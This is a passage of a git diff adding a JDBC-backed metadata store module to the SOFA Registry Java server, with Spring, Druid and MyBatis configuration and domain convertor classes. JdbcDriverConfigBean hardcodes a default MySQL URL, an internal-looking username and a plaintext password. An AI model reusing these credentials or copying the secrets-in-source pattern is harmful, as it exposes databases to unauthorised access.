b/server/store/jdbc/pom.xml new file mode 100644 index 000000000..91660f5b4 --- /dev/null +++ b/server/store/jdbc/pom.xml @@ -0,0 +1,113 @@ + + + 4.0.0 + + com.alipay.sofa + registry-store + 6.0.1 + ../pom.xml + + + registry-store-jdbc + + + ../../../ + + + + + + com.alipay.sofa + registry-store-common + + + com.alipay.sofa + registry-common-util + + + org.springframework.boot + spring-boot-starter + + + org.springframework.boot + spring-boot-starter-logging + + + + + + + org.springframework.boot + spring-boot-starter-jdbc + + + + + + + + + + + + + + com.alibaba + druid + + + + + org.mybatis + mybatis + + + org.mybatis + mybatis-spring + + + + + mysql + mysql-connector-java + + + + com.google.guava + guava + + + + com.h2database + h2 + 1.4.200 + test + + + + junit + junit + test + + + org.springframework + spring-test + test + + + org.springframework.boot + spring-boot-test + test + + + + org.mockito + mockito-core + test + + + + + diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/DefaultCommonConfig.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/DefaultCommonConfig.java new file mode 100644 index 000000000..ff1e0202f --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/DefaultCommonConfig.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +/** + * @author xiaojian.xj + * @version $Id: DefaultCommonConfig.java, v 0.1 2021年03月22日 21:05 xiaojian.xj Exp $ + */ +public interface DefaultCommonConfig { + + String getClusterId(); +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/DefaultCommonConfigBean.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/DefaultCommonConfigBean.java new file mode 100644 index 000000000..26d83f76d --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/DefaultCommonConfigBean.java @@ -0,0 +1,48 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +import com.alipay.sofa.common.profile.StringUtil; +import com.alipay.sofa.registry.util.SystemUtils; + +/** + * @author xiaojian.xj + * @version $Id: DefaultCommonConfigBean.java, v 0.1 2021年03月22日 21:06 xiaojian.xj Exp $ + */ +public class DefaultCommonConfigBean implements DefaultCommonConfig { + + private String dataCenter = SystemUtils.getSystem("nodes.localDataCenter", "DefaultDataCenter"); + + private String clusterId = SystemUtils.getSystem("nodes.clusterId", ""); + + @Override + public String getClusterId() { + if (StringUtil.isNotEmpty(clusterId)) { + return clusterId; + } + return dataCenter; + } + + /** + * Setter method for property clusterId. + * + * @param clusterId value to be assigned to property clusterId + */ + public void setClusterId(String clusterId) { + this.clusterId = clusterId; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcConfiguration.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcConfiguration.java new file mode 100644 index 000000000..8c10d77e7 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcConfiguration.java @@ -0,0 +1,248 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_DRIVERCLASSNAME; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_INIT; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_LOGABANDONED; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_MAXACTIVE; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_MAXWAIT; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_MINIDLE; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_PASSWORD; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_REMOVEABANDONED; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_REMOVEABANDONEDTIMEOUT; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_URL; +import static com.alibaba.druid.pool.DruidDataSourceFactory.PROP_USERNAME; + +import com.alibaba.druid.filter.logging.Slf4jLogFilter; +import com.alibaba.druid.pool.DruidDataSourceFactory; +import com.alipay.sofa.registry.jdbc.repository.batch.AppRevisionBatchQueryCallable; +import com.alipay.sofa.registry.jdbc.repository.batch.AppRevisionHeartbeatBatchCallable; +import com.alipay.sofa.registry.jdbc.repository.batch.InterfaceAppBatchQueryCallable; +import com.alipay.sofa.registry.jdbc.repository.impl.AppRevisionHeartbeatJdbcRepository; +import com.alipay.sofa.registry.jdbc.repository.impl.AppRevisionJdbcRepository; +import com.alipay.sofa.registry.jdbc.repository.impl.InterfaceAppsJdbcRepository; +import com.alipay.sofa.registry.jdbc.repository.impl.ProvideDataJdbcRepository; +import com.alipay.sofa.registry.store.api.meta.ProvideDataRepository; +import com.alipay.sofa.registry.store.api.repository.AppRevisionHeartbeatRepository; +import com.alipay.sofa.registry.store.api.repository.AppRevisionRepository; +import com.alipay.sofa.registry.store.api.repository.InterfaceAppsRepository; +import com.alipay.sofa.registry.store.api.spring.SpringContext; +import com.alipay.sofa.registry.util.SystemUtils; +import com.google.common.collect.Lists; +import java.util.Arrays; +import java.util.List; +import java.util.Properties; +import javax.sql.DataSource; +import org.apache.ibatis.mapping.DatabaseIdProvider; +import org.apache.ibatis.mapping.VendorDatabaseIdProvider; +import org.apache.ibatis.session.SqlSessionFactory; +import org.mybatis.spring.SqlSessionFactoryBean; +import org.mybatis.spring.annotation.MapperScan; +import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty; +import org.springframework.boot.context.properties.EnableConfigurationProperties; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; +import org.springframework.core.io.Resource; +import org.springframework.core.io.support.PathMatchingResourcePatternResolver; +import org.springframework.core.io.support.ResourcePatternResolver; +import org.springframework.jdbc.datasource.DataSourceTransactionManager; +import org.springframework.transaction.support.TransactionTemplate; + +/** + * @author xiaojian.xj + * @version $Id: JdbcConfiguration.java, v 0.1 2021年01月17日 16:28 xiaojian.xj Exp $ + */ +@Configuration +@EnableConfigurationProperties +@ConditionalOnProperty( + value = SpringContext.PERSISTENCE_PROFILE_ACTIVE, + havingValue = SpringContext.META_STORE_API_JDBC) +public class JdbcConfiguration { + + @Configuration + @MapperScan(basePackages = "com.alipay.sofa.registry.jdbc.mapper") + public static class MybatisBeanConfiguration { + @Bean + public JdbcDriverConfig jdbcDriverConfig() { + return new JdbcDriverConfigBean(); + } + + @Bean + public Slf4jLogFilter logFilter() { + Slf4jLogFilter filter = new Slf4jLogFilter(); + filter.setResultSetLogEnabled(true); + filter.setConnectionLogEnabled(true); + filter.setStatementParameterClearLogEnable(true); + filter.setStatementCreateAfterLogEnabled(true); + filter.setStatementCloseAfterLogEnabled(true); + filter.setStatementParameterSetLogEnabled(true); + filter.setStatementPrepareAfterLogEnabled(true); + filter.setStatementExecutableSqlLogEnable(true); + return filter; + } + + /** + * create datasource + * + * @return + * @throws Exception + */ + @Bean + public DataSource dataSource(JdbcDriverConfig jdbcDriverConfig, Slf4jLogFilter logFilter) + throws Exception { + Properties props = new Properties(); + props.put( + PROP_DRIVERCLASSNAME, + SystemUtils.getSystem(PROP_DRIVERCLASSNAME, jdbcDriverConfig.getDriverClassName())); + props.put(PROP_URL, SystemUtils.getSystem(PROP_URL, jdbcDriverConfig.getUrl())); + props.put( + PROP_USERNAME, SystemUtils.getSystem(PROP_USERNAME, jdbcDriverConfig.getUsername())); + props.put( + PROP_PASSWORD, SystemUtils.getSystem(PROP_PASSWORD, jdbcDriverConfig.getPassword())); + + // todo connection pool config + props.put(PROP_MINIDLE, jdbcDriverConfig.getMinIdle() + ""); + props.put(PROP_MAXACTIVE, jdbcDriverConfig.getMaxActive() + ""); + props.put(PROP_MAXWAIT, jdbcDriverConfig.getMaxWait() + ""); + props.put(PROP_REMOVEABANDONED, "true"); + props.put(PROP_REMOVEABANDONEDTIMEOUT, "30"); + props.put(PROP_LOGABANDONED, "true"); + props.put(PROP_INIT, "true"); + + // log filter + // props.put(PROP_FILTERS, logFilter); + + DataSource dataSource = DruidDataSourceFactory.createDataSource(props); + + return dataSource; + } + + @Bean + public DatabaseIdProvider databaseIdProvider() { + DatabaseIdProvider databaseIdProvider = new VendorDatabaseIdProvider(); + Properties p = new Properties(); + p.setProperty("MySQL", "mysql"); + p.setProperty("H2", "h2"); + databaseIdProvider.setProperties(p); + return databaseIdProvider; + } + + /** + * create sqlSessionFactory + * + * @param dataSource + * @return + * @throws Exception + */ + @Bean + public SqlSessionFactory sqlSessionFactory( + DataSource dataSource, + JdbcDriverConfig jdbcDriverConfig, + DatabaseIdProvider databaseIdProvider) + throws Exception { + SqlSessionFactoryBean factoryBean = new SqlSessionFactoryBean(); + factoryBean.setDataSource(dataSource); + factoryBean.setDatabaseIdProvider(databaseIdProvider); + // factoryBean.setTypeAliasesPackage(jdbcDriverConfig.getTypeAliasesPackage()); + ResourcePatternResolver resolver = new PathMatchingResourcePatternResolver(); + + List resources = Lists.newArrayList(); + for (String location : jdbcDriverConfig.getMapperLocations()) { + resources.addAll(Arrays.asList(resolver.getResources(location))); + } + + factoryBean.setMapperLocations(resources.toArray(new Resource[0])); + return factoryBean.getObject(); + } + + @Bean + public DataSourceTransactionManager transactionManager(DataSource dataSource) { + DataSourceTransactionManager transactionManager = new DataSourceTransactionManager(); + transactionManager.setDataSource(dataSource); + return transactionManager; + } + + @Bean + public TransactionTemplate transactionTemplate( + DataSourceTransactionManager transactionManager) { + TransactionTemplate transactionTemplate = new TransactionTemplate(); + transactionTemplate.setTransactionManager(transactionManager); + return transactionTemplate; + } + } + + @Configuration + public static class MetadataBeanConfiguration { + + @Bean + public DefaultCommonConfig defaultCommonConfig() { + return new DefaultCommonConfigBean(); + } + + @Bean + public MetadataConfig metadataConfig() { + return new MetadataConfigBean(); + } + + @Bean + public MetaElectorConfig metaElectorConfig() { + return new MetaElectorConfigBean(); + } + } + + @Configuration + public static class RepositoryBeanConfiguration { + + /** JDBC Repository */ + @Bean + public AppRevisionRepository appRevisionJdbcRepository() { + return new AppRevisionJdbcRepository(); + } + + @Bean + public InterfaceAppsRepository interfaceAppsJdbcRepository() { + return new InterfaceAppsJdbcRepository(); + } + + @Bean + public AppRevisionHeartbeatRepository appRevisionHeartbeatJdbcRepository() { + return new AppRevisionHeartbeatJdbcRepository(); + } + + @Bean + public ProvideDataRepository provideDataJdbcRepository() { + return new ProvideDataJdbcRepository(); + } + + /** batch callable */ + @Bean + public AppRevisionBatchQueryCallable appRevisionBatchQueryCallable() { + return new AppRevisionBatchQueryCallable(); + } + + @Bean + public InterfaceAppBatchQueryCallable interfaceAppBatchQueryCallable() { + return new InterfaceAppBatchQueryCallable(); + } + + @Bean + public AppRevisionHeartbeatBatchCallable appRevisionHeartbeatBatchCallable() { + return new AppRevisionHeartbeatBatchCallable(); + } + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcDriverConfig.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcDriverConfig.java new file mode 100644 index 000000000..727f42ec7 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcDriverConfig.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +/** + * @author xiaojian.xj + * @version $Id: JdbcDriverConfig.java, v 0.1 2021年01月17日 17:28 xiaojian.xj Exp $ + */ +public interface JdbcDriverConfig { + + String getDriverClassName(); + + String getUrl(); + + String getUsername(); + + String getPassword(); + + // get domain path + String getTypeAliasesPackage(); + + // get mapper.xml path + String[] getMapperLocations(); + + int getMinIdle(); + + int getMaxActive(); + + int getMaxWait(); +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcDriverConfigBean.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcDriverConfigBean.java new file mode 100644 index 000000000..51e560c77 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcDriverConfigBean.java @@ -0,0 +1,218 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +import org.springframework.boot.context.properties.ConfigurationProperties; + +/** + * @author xiaojian.xj + * @version $Id: JdbcDriverConfigBean.java, v 0.1 2021年01月17日 16:39 xiaojian.xj Exp $ + */ +@ConfigurationProperties(prefix = JdbcDriverConfigBean.PRE_FIX) +public class JdbcDriverConfigBean implements JdbcDriverConfig { + + public static final String PRE_FIX = "jdbc"; + + private String driverClassName = "com.mysql.jdbc.Driver"; + + private String url = + "jdbc:mysql://127.0.0.1:2883/metadatadb?useUnicode=true&characterEncoding=utf8"; + + private String username = "obvip_infra_dev_1:infra_public_dev0_2769:metadatadb"; + + private String password = "7Yh4Csc4"; + + private String typeAliasesPackage; + + private String[] mapperLocations = {"classpath:mapper/*.xml"}; + + private int minIdle = 3; + + private int maxActive = 5; + + private int maxWait = 3000; + + /** + * Getter method for property driverClassName. + * + * @return property value of driverClassName + */ + @Override + public String getDriverClassName() { + return driverClassName; + } + + /** + * Setter method for property driverClassName. + * + * @param driverClassName value to be assigned to property driverClassName + */ + public void setDriverClassName(String driverClassName) { + this.driverClassName = driverClassName; + } + + /** + * Getter method for property url. + * + * @return property value of url + */ + @Override + public String getUrl() { + return url; + } + + /** + * Setter method for property url. + * + * @param url value to be assigned to property url + */ + public void setUrl(String url) { + this.url = url; + } + + /** + * Getter method for property username. + * + * @return property value of username + */ + public String getUsername() { + return username; + } + + /** + * Setter method for property username. + * + * @param username value to be assigned to property username + */ + public void setUsername(String username) { + this.username = username; + } + + /** + * Getter method for property password. + * + * @return property value of password + */ + @Override + public String getPassword() { + return password; + } + + /** + * Setter method for property password. + * + * @param password value to be assigned to property password + */ + public void setPassword(String password) { + this.password = password; + } + + /** + * Getter method for property typeAliasesPackage. + * + * @return property value of typeAliasesPackage + */ + @Override + public String getTypeAliasesPackage() { + return typeAliasesPackage; + } + + /** + * Setter method for property typeAliasesPackage. + * + * @param typeAliasesPackage value to be assigned to property typeAliasesPackage + */ + public void setTypeAliasesPackage(String typeAliasesPackage) { + this.typeAliasesPackage = typeAliasesPackage; + } + + /** + * Getter method for property mapperLocations. + * + * @return property value of mapperLocations + */ + @Override + public String[] getMapperLocations() { + return mapperLocations; + } + + /** + * Setter method for property mapperLocations. + * + * @param mapperLocations value to be assigned to property mapperLocations + */ + public void setMapperLocations(String[] mapperLocations) { + this.mapperLocations = mapperLocations; + } + + /** + * Getter method for property minIdle. + * + * @return property value of minIdle + */ + @Override + public int getMinIdle() { + return minIdle; + } + + /** + * Setter method for property minIdle. + * + * @param minIdle value to be assigned to property minIdle + */ + public void setMinIdle(int minIdle) { + this.minIdle = minIdle; + } + + /** + * Getter method for property maxActive. + * + * @return property value of maxActive + */ + @Override + public int getMaxActive() { + return maxActive; + } + + /** + * Setter method for property maxActive. + * + * @param maxActive value to be assigned to property maxActive + */ + public void setMaxActive(int maxActive) { + this.maxActive = maxActive; + } + + /** + * Getter method for property maxWait. + * + * @return property value of maxWait + */ + @Override + public int getMaxWait() { + return maxWait; + } + + /** + * Setter method for property maxWait. + * + * @param maxWait value to be assigned to property maxWait + */ + public void setMaxWait(int maxWait) { + this.maxWait = maxWait; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcElectorConfiguration.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcElectorConfiguration.java new file mode 100644 index 000000000..8542f34a4 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/JdbcElectorConfiguration.java @@ -0,0 +1,46 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +import com.alipay.sofa.registry.jdbc.elector.MetaJdbcLeaderElector; +import com.alipay.sofa.registry.store.api.elector.LeaderElector; +import com.alipay.sofa.registry.store.api.spring.SpringContext; +import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty; +import org.springframework.boot.context.properties.EnableConfigurationProperties; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; + +/** + * @author xiaojian.xj + * @version $Id: JdbcElectorConfiguration.java, v 0.1 2021年04月14日 19:47 xiaojian.xj Exp $ + */ +@Configuration +@EnableConfigurationProperties +@ConditionalOnProperty( + value = SpringContext.PERSISTENCE_PROFILE_ACTIVE, + havingValue = SpringContext.META_STORE_API_JDBC) +public class JdbcElectorConfiguration { + + @Configuration + public static class JdbcElectorBeanConfiguration { + + @Bean + public LeaderElector leaderElector() { + return new MetaJdbcLeaderElector(); + } + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetaElectorConfig.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetaElectorConfig.java new file mode 100644 index 000000000..25a91136c --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetaElectorConfig.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +/** + * @author xiaojian.xj + * @version $Id: MetaElectorConfig.java, v 0.1 2021年03月17日 16:49 xiaojian.xj Exp $ + */ +public interface MetaElectorConfig { + + long getLockExpireDuration(); +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetaElectorConfigBean.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetaElectorConfigBean.java new file mode 100644 index 000000000..1e5f60e37 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetaElectorConfigBean.java @@ -0,0 +1,45 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +import org.springframework.boot.context.properties.ConfigurationProperties; + +/** + * @author xiaojian.xj + * @version $Id: MetaElectorConfigBean.java, v 0.1 2021年03月17日 16:49 xiaojian.xj Exp $ + */ +@ConfigurationProperties(prefix = MetaElectorConfigBean.PRE_FIX) +public class MetaElectorConfigBean implements MetaElectorConfig { + + public static final String PRE_FIX = "meta.server.elector"; + + private long lockExpireDuration = 20 * 1000; + + @Override + public long getLockExpireDuration() { + return lockExpireDuration; + } + + /** + * Setter method for property lockExpireDuration. + * + * @param lockExpireDuration value to be assigned to property lockExpireDuration + */ + public void setLockExpireDuration(long lockExpireDuration) { + this.lockExpireDuration = lockExpireDuration; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetadataConfig.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetadataConfig.java new file mode 100644 index 000000000..be0ffa853 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetadataConfig.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +/** + * @author xiaojian.xj + * @version $Id: MetadataConfig.java, v 0.1 2021年02月24日 15:20 xiaojian.xj Exp $ + */ +public interface MetadataConfig { + + int getInterfaceAppsRefreshLimit(); + + int getRevisionGcLimit(); +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetadataConfigBean.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetadataConfigBean.java new file mode 100644 index 000000000..505a94d4c --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/config/MetadataConfigBean.java @@ -0,0 +1,70 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.config; + +import org.springframework.boot.context.properties.ConfigurationProperties; + +/** + * @author xiaojian.xj + * @version $Id: MetadataConfigBean.java, v 0.1 2021年02月24日 15:21 xiaojian.xj Exp $ + */ +@ConfigurationProperties(prefix = MetadataConfigBean.PRE_FIX) +public class MetadataConfigBean implements MetadataConfig { + + public static final String PRE_FIX = "metadata.server"; + + private int interfaceAppsRefreshLimit = 1000; + + private int revisionGcLimit = 100; + + /** + * Getter method for property interfaceAppsRefreshLimit. + * + * @return property value of interfaceAppsRefreshLimit + */ + public int getInterfaceAppsRefreshLimit() { + return interfaceAppsRefreshLimit; + } + + /** + * Setter method for property interfaceAppsRefreshLimit. + * + * @param interfaceAppsRefreshLimit value to be assigned to property interfaceAppsRefreshLimit + */ + public void setInterfaceAppsRefreshLimit(int interfaceAppsRefreshLimit) { + this.interfaceAppsRefreshLimit = interfaceAppsRefreshLimit; + } + + /** + * Getter method for property revisionGcLimit. + * + * @return property value of revisionGcLimit + */ + @Override + public int getRevisionGcLimit() { + return revisionGcLimit; + } + + /** + * Setter method for property revisionGcLimit. + * + * @param revisionGcLimit value to be assigned to property revisionGcLimit + */ + public void setRevisionGcLimit(int revisionGcLimit) { + this.revisionGcLimit = revisionGcLimit; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/convertor/AppRevisionDomainConvertor.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/convertor/AppRevisionDomainConvertor.java new file mode 100644 index 000000000..1bdbc6e4a --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/convertor/AppRevisionDomainConvertor.java @@ -0,0 +1,86 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.convertor; + +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.core.model.AppRevisionInterface; +import com.alipay.sofa.registry.jdbc.domain.AppRevisionDomain; +import com.alipay.sofa.registry.util.JsonUtils; +import com.fasterxml.jackson.core.type.TypeReference; +import java.util.ArrayList; +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import org.springframework.util.CollectionUtils; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionDomainConvertor.java, v 0.1 2021年01月18日 19:00 xiaojian.xj Exp $ + */ +public class AppRevisionDomainConvertor { + + public static final TypeReference BASE_FORMAT = + new TypeReference>>() {}; + public static final TypeReference SERVICE_FORMAT = + new TypeReference>() {}; + + public static AppRevisionDomain convert2Domain(String dataCenter, AppRevision appRevision) { + if (appRevision == null) { + return null; + } + AppRevisionDomain domain = new AppRevisionDomain(); + domain.setAppName(appRevision.getAppName()); + domain.setDataCenter(dataCenter); + domain.setRevision(appRevision.getRevision()); + domain.setClientVersion(appRevision.getClientVersion()); + domain.setBaseParams(JsonUtils.writeValueAsString(appRevision.getBaseParams())); + domain.setServiceParams(JsonUtils.writeValueAsString(appRevision.getInterfaceMap())); + return domain; + } + + public static AppRevision convert2Revision(AppRevisionDomain domain) { + + if (domain == null) { + return null; + } + + AppRevision appRevision = new AppRevision(); + appRevision.setDataCenter(domain.getDataCenter()); + appRevision.setAppName(domain.getAppName()); + appRevision.setRevision(domain.getRevision()); + appRevision.setClientVersion(domain.getClientVersion()); + appRevision.setBaseParams(JsonUtils.read(domain.getBaseParams(), BASE_FORMAT)); + appRevision.setInterfaceMap(JsonUtils.read(domain.getServiceParams(), SERVICE_FORMAT)); + appRevision.setLastHeartbeat(domain.getGmtModify()); + return appRevision; + } + + public static List convert2Revisions(List domains) { + if (CollectionUtils.isEmpty(domains)) { + return Collections.EMPTY_LIST; + } + + List revisions = new ArrayList<>(); + for (AppRevisionDomain domain : domains) { + AppRevision revision = convert2Revision(domain); + if (revision != null) { + revisions.add(revision); + } + } + return revisions; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/convertor/ProvideDataDomainConvertor.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/convertor/ProvideDataDomainConvertor.java new file mode 100644 index 000000000..8d70ac58c --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/convertor/ProvideDataDomainConvertor.java @@ -0,0 +1,73 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache 